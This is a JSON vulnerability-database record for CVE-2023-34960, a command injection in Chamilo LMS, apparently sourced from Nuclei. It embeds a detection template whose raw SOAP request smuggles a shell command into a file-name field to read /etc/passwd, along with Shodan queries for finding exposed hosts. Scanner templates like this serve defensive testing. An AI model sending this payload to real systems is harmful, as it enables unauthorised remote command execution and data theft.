{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-34960/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-34960/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-34960/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-34960/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-34960/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-34960"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-34960"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-34960.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2023-34960\n\ninfo:\n  name: Chamilo Command Injection\n  author: DhiyaneshDK\n  severity: critical\n  description: |\n    A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.\n  remediation: |\n    Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS.\n  reference:\n    - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D\n    - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py\n    - http://chamilo.com\n    - http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html\n    - https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-34960\n    cwe-id: CWE-77\n    epss-score: 0.99325\n    epss-percentile: 0.99938\n    cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*\n  metadata:\n    verified: \"true\"\n    max-request: 1\n    vendor: chamilo\n    product: chamilo\n    shodan-query:\n      - http.component:\"Chamilo\"\n      - http.component:\"chamilo\"\n      - cpe:\"cpe:2.3:a:chamilo:chamilo\"\n  tags: cve,cve2023,packetstorm,chamilo,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /main/webservices/additional_webservices.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/xml; charset=utf-8\n\n        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{RootURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type=\"ns2:Map\"><item><key xsi:type=\"xsd:string\">file_data</key><value xsi:type=\"xsd:string\"></value></item><item><key xsi:type=\"xsd:string\">file_name</key><value xsi:type=\"xsd:string\">`{}`.pptx'|\" |cat /etc/passwd||a #</value></item><item><key xsi:type=\"xsd:string\">service_ppt2lp_size</key><value xsi:type=\"xsd:string\">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n        part: body\n\n      - type: word\n        part: header\n        words:\n          - text/xml\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100a8bd0a9f7b2807ad625434c4312864c5bf8c5f4d0b236dd46c6a4bca2ca6b8120220614f443a83c5f39f2105acea9729c9ea50c79ea1864c39ccce5986fc8e6cd3d6:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-34960"
}